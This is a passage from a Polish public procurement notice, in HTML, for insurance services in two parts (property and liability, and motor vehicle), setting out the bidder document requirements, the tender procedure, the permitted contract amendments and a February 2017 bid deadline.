4.	Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać wykonawców                        do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających,                         że nie podlegają wykluczeniu, spełniają warunki udziału w postępowaniu,  a jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów.

5.	Wykonawca, który podlega wykluczeniu na podstawie art. 24 ust. 1 pkt 13 i 14 oraz 16-20                             lub ust. 5 pkt 1 ustawy Pzp, może przedstawić dowody na to, że podjęte przez niego środki są wystarczające do wykazania rzetelności, w szczególności udowodnić naprawienie szkody wyrządzonej przestępstwem lub przestępstwem skarbowym, zadośćuczynienie pieniężne                      za doznaną krzywdę lub naprawienie szkody, wyczerpujące wyjaśnienie stanu faktycznego oraz współpracę z organami ścigania oraz podjęcie konkretnych środków technicznych, organizacyjnych i kadrowych, które są odpowiednie dla zapobiegania dalszym przestępstwom lub przestępstwom skarbowym lub nieprawidłowemu postępowaniu wykonawcy. Przepisu zdania pierwszego nie stosuje się, jeżeli wobec wykonawcy, będącego podmiotem zbiorowym, orzeczono prawomocnym wyrokiem sądu zakaz ubiegania się o udzielenie zamówienia                       oraz upłynął określony w tym wyroku okres obowiązywania tego zakazu.

6.	Dokumenty podmiotów zagranicznych:
1)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w § 6a ust. 2 pkt 3 siwz, składa dokument wystawiony w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony                           nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentu, o którym mowa w pkt 1, zastępuje się go dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym                     ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Przepis pkt 1 stosuje się.
3)	W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.
4)	W przypadku wskazania przez wykonawcę dostępności oświadczeń lub dokumentów wymaganych w niniejszym postępowaniu, w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, zamawiający pobiera samodzielnie z tych baz danych wskazane przez wykonawcę oświadczenia lub dokumenty.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.	Wykaz oświadczeń lub dokumentów, składanych w postępowaniu przez wykonawcę na wezwanie Zamawiającego  w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 ustawy Pzp, tj. w zakresie spełniania warunków udziału                                      w postępowaniu określonych w § 5 ust. 2 siwz:
Dotyczy części 1 i 2:
1)	określonych w ust. 2.1 siwz:
                 - zezwolenie Komisji Nadzoru Finansowego na prowadzenie działalności ubezpieczeniowej, zgodnie z art. 7 ust. 1 ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej                     i reasekuracyjnej (Dz. U. z 2015 r. poz. 1844) i/ lub
- zezwolenie Ministra Finansów na wykonywanie działalności ubezpieczeniowej (jeżeli wykonawca uzyskał zezwolenie przed dniem 1 stycznia 2004r.), i/lub
- potwierdzenie Komisji Nadzoru Finansowego i/lub inny dokument potwierdzający,                    że wykonawca posiada uprawnienia do prowadzenia działalności ubezpieczeniowej (jeżeli wykonawca rozpoczął działalność ubezpieczeniową przed dniem 28.08.1990r.), i/lub
- zezwolenie właściwego organu na wykonywanie działalności ubezpieczeniowej                              w państwie członkowskim Unii Europejskiej, w którym wykonawca ma siedzibę i/lub inny dokument potwierdzający, że wykonawca posiada uprawnienia do prowadzenia działalności ubezpieczeniowej.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)	Wypełniony i podpisany formularz ofertowy (zał. nr 1 do siwz).
2)	W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku wykonawców - wykonawca winien załączyć do oferty pełnomocnictwo podpisane przez wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia, złożone w formie oryginału lub notarialnie potwierdzonej kopii. Wzór pełnomocnictwa stanowi załącznik nr 7 do siwz. 
3)	W przypadku ustanowienia przez Wykonawcę pełnomocnika, do oferty należy załączyć oryginał udzielonego pełnomocnictwa lub notarialnie potwierdzoną jego kopię. Z treści pełnomocnictwa musi jednoznacznie wynikać zakres umocowania do czynności związanych                   z postępowaniem o udzielenie zamówienia publicznego, w szczególności do podpisania                       i złożenia oferty.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Część I:
1.	Zakazuje się zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zachodzi co najmniej jedna z okoliczności określonych                              w art. 144 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz.U. z 2015r. poz. 2164 z późn. zm.)  dalej ustawa Pzp.
2.	Zgodnie z art. 144 ust. 1 pkt 1 ustawy Pzp, przewiduje się możliwość wprowadzenia niżej wymienionych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: 
1)	zmiany terminów płatności, wysokości i liczby rat składki  taka zmiana zostanie dokonana, bez dodatkowej zwyżki składki, na pisemny wniosek Zamawiającego złożony przed upływem terminu płatności składki przewidzianym w umowie oraz dokumentach ubezpieczenia,                       po uprzedniej zgodzie Wykonawcy;
2)	zmiany wysokości składki lub raty składki w ubezpieczeniach majątkowych w przypadku zmiany sumy ubezpieczenia  w przypadku zmiany wartości majątku w okresie ubezpieczenia oraz w wyniku nabycia składników majątkowych w okresie pomiędzy zebraniem danych                     a rozpoczęciem okresu ubezpieczenia. Składka będzie rozliczana zgodnie z określonymi                             w siwz zapisami klauzuli warunków i taryf oraz klauzul automatycznego pokrycia;
3)	zmiany wysokości składki lub raty składki w ubezpieczeniu odpowiedzialności cywilnej                           i ubezpieczeniach zawartych w systemie na pierwsze ryzyko w wyniku podwyższenia wysokości sumy gwarancyjnej i zmiany limitów odpowiedzialności. Składka będzie rozliczana zgodnie z określonymi w siwz zapisami klauzuli warunków i taryf;
4)	zmiany wysokości składki w ubezpieczeniu mienia od ognia i innych zdarzeń losowych                    w przypadku zmiany sumy ubezpieczenia budynków i budowli  w przypadku zmiany rodzaju wartości budynków/budowli (np. z wartości księgowej brutto na wartość odtworzeniową). Składka będzie rozliczana zgodnie z określonymi w siwz zapisami klauzuli warunków i taryf;
5)	zmiany wysokości składki lub raty składki w ubezpieczeniu następstw nieszczęśliwych wypadków    ubezpieczenia  w przypadku zmiany liczby osób ubezpieczonych oraz wysokości sumy ubezpieczenia na osobę w okresie ubezpieczenia. Składka będzie rozliczana zgodnie                     z określonymi w siwz zapisami klauzuli warunków i taryf;
6)	zmiany wysokości składki w przypadku wprowadzenia na usługi ubezpieczeniowe podatku                   od towarów i usług (VAT) lub zmiany stawki tego podatku, jeżeli będzie miał zastosowanie                  do usług ubezpieczeniowych. Składka ulega podwyższeniu o kwotę naliczonego podatku VAT;
7)	zmiany dotyczące liczby jednostek organizacyjnych Zamawiającego podlegających ubezpieczeniu i ich formy prawnej - w przypadku:
a)	powstania nowych jednostek (w wyniku utworzenia, połączenia lub wyodrębnienia) - składka będzie rozliczana bądź naliczana zgodnie z określonymi w siwz zapisami klauzuli warunków i taryf;
b)	przekształcenia jednostki  warunki ubezpieczenia będą nie gorsze jak dla jednostki pierwotnej;  
c)	likwidacji jednostki  jednostka zostanie wyłączona z ochrony ubezpieczeniowej, a jeżeli jej mienie zostanie przekazane innym jednostkom organizacyjnym Zamawiającego,                   to zostanie ono objęte ochroną przez Wykonawcę na warunkach ubezpieczenia                       nie gorszych jak dla jednostki zlikwidowanej;  
d)	włączenia dodatkowych jednostek do ubezpieczenia w okresie realizacji zamówienia,                        na wniosek Zamawiającego i za zgodą Wykonawcy  dotyczy to jednostek nie objętych niniejszym zamówieniem. 
8)	korzystnej dla Zamawiającego zmiany zakresu ubezpieczenia wynikającej ze zmian OWU Wykonawcy oraz wprowadzenia nowych klauzul za zgodą Zamawiającego i Wykonawcy bez dodatkowej zwyżki składki;
9)	zmiany zaoferowanego zakresu i warunków ubezpieczenia, na podstawie których udzielana będzie ochrona ubezpieczeniowa - w przypadku zmiany ogólnie obowiązujących przepisów, które będą miały wpływ na zakres i warunki realizacji zawartej umowy;
3.	Zmiany postanowień niniejszej umowy, z zastrzeżeniem przypadków przewidzianych                              w umowie,  mogą również następować wskutek działania siły wyższej. 
4.	Pod pojęciem siły wyższej Strony rozumieją okoliczności, które pomimo zachowania należytej staranności i podjęcia wszelkich działań w normalnym zakresie, nie mogą być przez Strony przewidziane, oraz którym Strony nie mogą zapobiec, bądź się im przeciwstawić w sposób skuteczny.
5.	Zmiany postanowień niniejszej umowy,  o których mowa w ust. 1, w tym wynikające z przyczyn określonych w ust. 2 i 3, wymagają wystawienia stosownych polis, aneksów do polis już obowiązujących i/lub aneksu w formie pisemnej pod rygorem nieważności. 
6.	Wykonawcy przysługuje prawo do:
1)	rezygnacji z podwykonawcy; 
2)	 zmiany pierwotnie wskazanego podwykonawcy.
7.	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 22a ust. 1 ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, wykonawca jest obowiązany wykazać Zamawiającemu,                      że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu  nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.
Część II:
1.	Zakazuje się zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zachodzi co najmniej jedna z okoliczności określonych                              w art. 144 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz.U. z 2015r. poz. 2164 z późn. zm.)  dalej ustawa Pzp.
2.	Zgodnie z art. 144 ust. 1 pkt 1 ustawy Pzp, przewiduje się możliwość wprowadzenia niżej wymienionych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: 
1)	zmiany terminów płatności, wysokości i liczby rat składki  taka zmiana zostanie dokonana, bez dodatkowej zwyżki składki, na pisemny wniosek Zamawiającego złożony przed upływem terminu płatności składki przewidzianym w umowie oraz dokumentach ubezpieczenia,                       po uprzedniej zgodzie Wykonawcy;
2)	zmiany wysokości składki w ubezpieczeniach komunikacyjnych w przypadku zmiany sumy ubezpieczenia w ubezpieczeniu autocasco oraz w przypadku ubezpieczenia pojazdów nabywanych przez Zamawiającego (jednostki Zamawiającego) w trakcie trwania umowy                    o udzielenie zamówienia publicznego oraz sprzedaży lub likwidacji pojazdów przez Zamawiającego (jednostki Zamawiającego) i zmiany posiadacza pojazdów w tym okresie. Ostatnim dniem umożliwiającym ubezpieczenie pojazdu na warunkach umowy o udzielenie zamówienia publicznego jest ostatni dzień obowiązywania umowy to jest 1 marca 2020r. Maksymalnie okres ubezpieczenia pojazdów zakończy się dnia  28 lutego 2021r. Składka będzie rozliczana zgodnie z zapisami klauzuli warunków i taryf;
3)	zmiany wysokości składki w ubezpieczeniach komunikacyjnych związane z koniecznością zawarcia obowiązkowego ubezpieczenia OC posiadaczy pojazdów mechanicznych przez Zamawiającego, w przypadku orzeczenia decyzją sądu przepadku na rzecz Zamawiającego pojazdów, które są zarejestrowane i nie posiadają obowiązkowego ubezpieczenia OC posiadaczy pojazdów mechanicznych, na podstawie ustawy z dnia 22 lipca 2010 r. o zmianie ustawy  Prawo o ruchu drogowym oraz niektórych ustaw (Dz. U. z 2010 r. Nr 152,                   poz. 1018, z późn. zm.). W takim przypadku składka za ubezpieczenie OC p.p.m., na tego rodzaju pojazdy będzie rozłożona przez Wykonawcę na minimum cztery raty bez dodatkowej zwyżki składki, a po demontażu i wyrejestrowaniu lub dalszej odsprzedaży takiego pojazdu (jeśli nowy nabywca wypowie ubezpieczenie OC p.p.m.) Zamawiający uzyska zwrot niewykorzystanej składki za to ubezpieczenie od Wykonawcy w ciągu 30 dni od przekazania Wykonawcy informacji o wyrejestrowaniu lub sprzedaży pojazdu wraz z dokumentami potwierdzającymi wyrejestrowanie lub sprzedaż pojazdu;
4)	zmiany wysokości składki w przypadku wprowadzenia na usługi ubezpieczeniowe podatku                   od towarów i usług (VAT) lub zmiany stawki tego podatku, jeżeli będzie miał zastosowanie                  do usług ubezpieczeniowych. Składka ulega podwyższeniu o kwotę naliczonego podatku VAT;
5)	zmiany dotyczące liczby jednostek organizacyjnych Zamawiającego podlegających ubezpieczeniu i ich formy prawnej - w przypadku:
a)	powstania nowych jednostek (w wyniku utworzenia, połączenia lub wyodrębniania) - składka będzie rozliczana bądź naliczana zgodnie z określonymi w siwz zapisami klauzuli warunków i taryf;
b)	przekształcenia jednostki  warunki ubezpieczenia będą nie gorsze jak dla jednostki pierwotnej;  
c)	likwidacji jednostki  jednostka zostanie wyłączona z ochrony ubezpieczeniowej, a jeżeli jej mienie zostanie przekazane innym jednostkom organizacyjnym Zamawiającego,                   to zostanie ono objęte ochroną przez Wykonawcę na warunkach ubezpieczenia                       nie gorszych jak dla jednostki zlikwidowanej;
d)	włączenia dodatkowych jednostek do ubezpieczenia w okresie realizacji zamówienia,                        na wniosek Zamawiającego i za zgodą Wykonawcy  dotyczy to jednostek nie objętych niniejszym zamówieniem. 
6)	korzystnej dla Zamawiającego zmiany zakresu ubezpieczenia wynikające ze zmian OWU Wykonawcy oraz wprowadzenia nowych klauzul za zgodą Zamawiającego i Wykonawcy bez dodatkowej zwyżki składki;
7)	zmiany zaoferowanego zakresu i warunków ubezpieczenia, na podstawie których udzielana będzie ochrona ubezpieczeniowa  - w przypadku zmiany ogólnie obowiązujących przepisów, które będą miały wpływ na zakres i warunki realizacji zawartej umowy.
3.	Zmiany postanowień niniejszej umowy, z zastrzeżeniem przypadków przewidzianych                              w umowie,  mogą również następować wskutek działania siły wyższej. 
4.	Pod pojęciem siły wyższej Strony rozumieją okoliczności, które pomimo zachowania należytej staranności i podjęcia wszelkich działań w normalnym zakresie, nie mogą być przez Strony przewidziane, oraz którym Strony nie mogą zapobiec, bądź się im przeciwstawić w sposób skuteczny.
5.	Zmiany postanowień niniejszej umowy,  o których mowa w ust. 1, w tym wynikające z przyczyn określonych w ust. 2 i 3, wymagają wystawienia stosownych polis, aneksów do polis już obowiązujących i/lub aneksu w formie pisemnej pod rygorem nieważności. 
6.	Wykonawcy przysługuje prawo do:
1)	rezygnacji z podwykonawcy; 
2)	 zmiany pierwotnie wskazanego podwykonawcy.
7.	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 22a ust. 1 ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, wykonawca jest obowiązany wykazać Zamawiającemu,                      że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu  nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 10/02/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1.	Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. 
2.	Postępowanie o udzielenie zamówienia, z zastrzeżeniem wyjątków określonych w ustawie Pzp, prowadzi się z zachowaniem formy pisemnej.
3.	Komunikacja między zamawiającym a wykonawcami odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012r.  Prawo pocztowe (Dz.U. z 2012r. poz. 1529 oraz z 2015r. poz. 1830), osobiście, za pośrednictwem posłańca, faksu lub przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2013r. poz. 1422, z 2015r. poz. 1844 oraz z 2016r. poz. 147                  i 615).
4.	Jeżeli zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia                             oraz informacje za pośrednictwem faksu lub przy użyciu środków komunikacji elektronicznej                          w rozumieniu ustawy z dnia 18 lipca 2002r. o świadczeniu usług drogą elektroniczną, każda                              ze stron na żądanie drugiej strony niezwłocznie potwierdza fakt ich otrzymania.

5.	Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści specyfikacji istotnych warunków zamówienia. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem że wniosek 
o wyjaśnienie treści specyfikacji istotnych warunków zamówienia wpłynął do Zamawiającego nie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania ofert, 
tj. do dnia  06.02.2017r.

6.	Jeżeli wniosek o wyjaśnienie treści specyfikacji istotnych warunków zamówienia wpłynął                              po upływie terminu składania wniosków, o którym mowa w ust. 5, lub dotyczy udzielonych wyjaśnień, Zamawiający może udzielić wyjaśnień, albo pozostawić wniosek bez rozpatrzenia.

7.	Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku, o którym mowa w ust. 5.

8.	Zamawiający jednocześnie przekaże treść zapytań wraz z wyjaśnieniami wszystkim wykonawcom, którym przekazano siwz, bez ujawniania źródła zapytania oraz zamieszcza ich treść na stronie internetowej http://bip.powiat.ostrodzki.pl. 
9. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy zobowiązany jest przedłożyć Zamawiającemu, potwierdzoną za zgodność z oryginałem, kopię umowy regulującej współpracę wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeżeli oferta wybrana jako najkorzystniejsza została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.
10. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.
11.	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. 
12.	Zamawiający zastrzega, na podstawie art. 36a ust. 2 pkt 1 ustawy Pzp, obowiązek osobistego wykonania kluczowych części zamówienia przez Wykonawcę, tj. tych części zamówienia,                             dla realizacji których wymagane jest posiadanie uprawnień, o których mowa w § 5 siwz ust. 2.1. 
13.	Zamawiający żąda, aby przed przystąpieniem do wykonywania zamówienia wykonawca, o ile są już znane, podał nazwy albo imiona i nazwiska oraz dane kontaktowe podwykonawców i osób                              do kontaktu z nimi, zaangażowanych w realizację usługi objętej przedmiotem zamówienia. Wykonawca zawiadamia  Zamawiającego o wszelkich zmianach danych, o których mowa w zdaniu pierwszym, w trakcie realizacji zamówienia, a także przekazuje informacje na temat nowych podwykonawców, którym w późniejszym okresie zamierza powierzyć realizację usług. 
14.Wykonawca może złożyć ofertę na jedną wybraną lub na obydwie części objęte przedmiotem zamówienia. Zamawiający przewiduje możliwość udzielenia zamówienia jednemu wykonawcy                      na obydwie części objęte przedmiotem zamówienia, w przypadku wyboru jego oferty w obydwu częściach.</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
